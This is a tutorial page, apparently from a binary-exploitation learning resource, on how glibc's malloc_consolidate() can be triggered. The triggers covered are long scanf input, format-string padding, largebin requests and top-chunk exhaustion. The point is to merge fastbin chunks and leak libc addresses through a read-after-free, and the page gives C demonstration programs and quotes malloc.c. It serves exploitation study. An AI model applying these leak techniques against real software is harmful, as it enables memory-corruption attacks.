malloc_consolidate()

Consolidating fastbins

Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbin chunks would not. This is technically not true - they just don't consolidate automatically; in order for them to consolidate, the function malloc_consolidate() has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.
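
To make the leak concrete, here is a minimal sketch of the primitive (my own illustration, not from this page; the sizes 0x68 and 0x500 are arbitrary). It uses a largebin-sized malloc() - one of the triggers covered below - to force the consolidation, and it assumes the freed chunks actually reach the fastbins, so on tcache-enabled glibc (2.26 and later) it fills the corresponding tcache bin first:

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *tcache_fill[7], *victims[8];

        /* On tcache-enabled glibc, fill the 0x70 tcache bin first so the
           later frees actually reach the fastbin. */
        for (int i = 0; i < 7; i++)
            tcache_fill[i] = malloc(0x68);

        /* Adjacent fastbin-sized chunks, plus a guard so the consolidated
           chunk does not simply get absorbed into the top chunk. */
        for (int i = 0; i < 8; i++)
            victims[i] = malloc(0x68);
        malloc(0x18);                              /* guard chunk */

        for (int i = 0; i < 7; i++)
            free(tcache_fill[i]);                  /* tcache bin now full    */
        for (int i = 0; i < 8; i++)
            free(victims[i]);                      /* go to the 0x70 fastbin */

        /* A largebin-sized request makes _int_malloc call malloc_consolidate():
           the eight adjacent fastbin chunks merge into one large free chunk
           whose fd/bk point into main_arena, i.e. into libc. */
        malloc(0x500);

        /* In an exploit this read would be the Read-After-Free primitive. */
        printf("possible libc pointer: %p\n", *(void **)victims[0]);
    }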

This means that what we really need to know is how we can trigger a call to malloc_consolidate().

Some of the most important ways include:

  • Inputting a very long number into scanf (around 0x400 characters long) - see the sketch below

    • This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end, so it works to trigger those functions too - great for triggering hooks!).

  • Inputting something along the lines of %10000c into a format string vulnerability, which also triggers a chunk to be created

Both of these work because a largebin allocation triggers malloc_consolidate(). By checking the calls to the function in malloc.c (glibc 2.35), we can find other triggers.
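
As an illustration of the scanf trick, a victim only needs something like the following (my own minimal example; the digit count is just "comfortably more than 0x400"). Feeding it a very long number makes stdio outgrow its 0x400-byte scratch_buffer and fall back to a heap allocation, calling malloc_consolidate() on the way:

    #include <stdio.h>

    int main(void)
    {
        int choice;

        /* Sending ~0x400+ digits here (e.g. python3 -c 'print("1"*1200)')
           makes glibc's number parser allocate (and later free) a heap
           buffer for the digits, triggering malloc_consolidate(). */
        if (scanf("%d", &choice) != 1)
            return 1;

        printf("you chose %d\n", choice);
        return 0;
    }

Nothing about the victim has to touch the heap explicitly - the malloc (and the free, handy for hook-based techniques) happens entirely inside glibc's stdio code.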


It's possible for earlier or later glibc versions to have more or fewer calls to malloc_consolidate(), so make sure to check for your version! You may find another trigger exists.

The most common and most important trigger is a call to malloc() requesting a chunk of largebin size, which will trigger a call to malloc_consolidate():

    /*
       If this is a large request, consolidate fastbins before continuing [...]
     */
    else
      {
        idx = largebin_index (nb);
        if (atomic_load_relaxed (&av->have_fastchunks))
          malloc_consolidate (av);
      }

There is another call to it in the use_top section. This section is called when the top chunk has to be used to service the request. The first if condition checks if the top chunk is large enough to service the request:

    if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
    {
        remainder_size = size - nb;
        remainder = chunk_at_offset (victim, nb);
        av->top = remainder;
        set_head (victim, nb | PREV_INUSE |
                  (av != &main_arena ? NON_MAIN_ARENA : 0));
        set_head (remainder, remainder_size | PREV_INUSE);

        check_malloced_chunk (av, victim, nb);
        void *p = chunk2mem (victim);
        alloc_perturb (p, bytes);
        return p;
    }

If not, the next condition checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!

    else if (atomic_load_relaxed (&av->have_fastchunks))
    {
        malloc_consolidate (av);
        /* restore original bin index */
        if (in_smallbin_range (nb))
            idx = smallbin_index (nb);
        else
            idx = largebin_index (nb);
    }

So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate() (sketched at the end of this page).

(If both conditions fail, _int_malloc falls back to essentially using mmap to service the request.)

TODO

Calling mtrim will consolidate fastbins (which makes sense, given the name malloc_trim). Unlikely to ever be useful, but please do let me know if you find a use for it!

When changing malloc options using mallopt, the fastbins are first consolidated. This is pretty useless, as mallopt is likely called once (if at all) in the program prelude before it does anything.
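
Going back to the use_top trigger: the sketch below (again my own, with arbitrary sizes and a deliberately crude "fill the heap" loop) exhausts the top chunk with small, non-largebin requests while two fastbin chunks are pending, forcing the else if branch shown above to call malloc_consolidate():

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *tcache_fill[7], *a, *b;

        /* Fill the 0x70 tcache bin so the two frees below reach the fastbin
           (only needed on tcache-enabled glibc, 2.26 and later). */
        for (int i = 0; i < 7; i++)
            tcache_fill[i] = malloc(0x68);

        a = malloc(0x68);
        b = malloc(0x68);            /* two adjacent fastbin-sized chunks      */
        malloc(0x18);                /* guard: keep b away from the top chunk  */

        for (int i = 0; i < 7; i++)
            free(tcache_fill[i]);
        free(a);
        free(b);                     /* a and b now sit in the 0x70 fastbin    */

        /* Exhaust the top chunk with small requests. Once it is too small to
           service one of them, _int_malloc sees pending fastchunks and calls
           malloc_consolidate() before asking the kernel for more memory. */
        for (int i = 0; i < 2000; i++)
            malloc(0x1f8);

        /* a and b were merged into one free chunk in a normal bin, so a's old
           fd field now points into main_arena (inside libc). */
        printf("possible libc pointer: %p\n", *(void **)a);
    }

Note that the filler requests must not be largebin-sized themselves, otherwise the first trigger (the largebin branch) fires long before the top chunk runs out.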